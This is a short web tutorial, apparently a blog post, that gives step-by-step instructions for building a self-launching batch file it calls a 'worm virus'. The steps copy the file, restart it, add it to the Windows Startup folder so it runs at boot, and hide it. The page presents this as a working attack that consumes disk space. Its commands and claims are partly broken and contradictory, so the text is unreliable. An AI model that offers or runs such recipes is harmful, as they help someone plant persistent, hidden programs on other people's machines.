How To Make A Simple Virus For Beginners
Steps
-
1
Log on to your computer as an administrator.
Ad
-
2
Go on C drive and create a folder, name it "Programs"
-
3
Open up notepad and type in "@echo off"
-
4
Then, write "Copy C:\Programs\virus.bat C:\Programs" on the second line. On the third line write "Start C:\Programs\virus.bat".
-
5
Click "Save as" and save as virus.bat in the file (Programs) you just made.
-
6
If you want the worm to start whenever the computer starts, right click on "virus.bat" and click create shortcut. A shortcut will be made on programs.
-
7
Right click on the shortcut icon and click "cut".
-
8
Right click on the shortcut and click "copy".
-
9
Right click on your start menu and click "explore".
-
10
Go to All Programs, then find the file named startup.
-
11
Paste the shortcut onto the startup folder.
-
12
Right click on the shortcut and go to properties, click on hidden, then press "Apply" or "OK".
13
You have successfully made a working worm virus. To start it, restart your computer and the disk space on C drive will be eaten away.
-
14
To get rid of the worm virus just simply delete the "programs" file.
Ad
Tips
- If you want to hide the programs file, go to properties and click hidden.
- In order to delete the batch file, click "show hidden files" on folder properties and delete the shortcuts. In startup menu, they will be automatically started on system boot.
No comments:
Post a Comment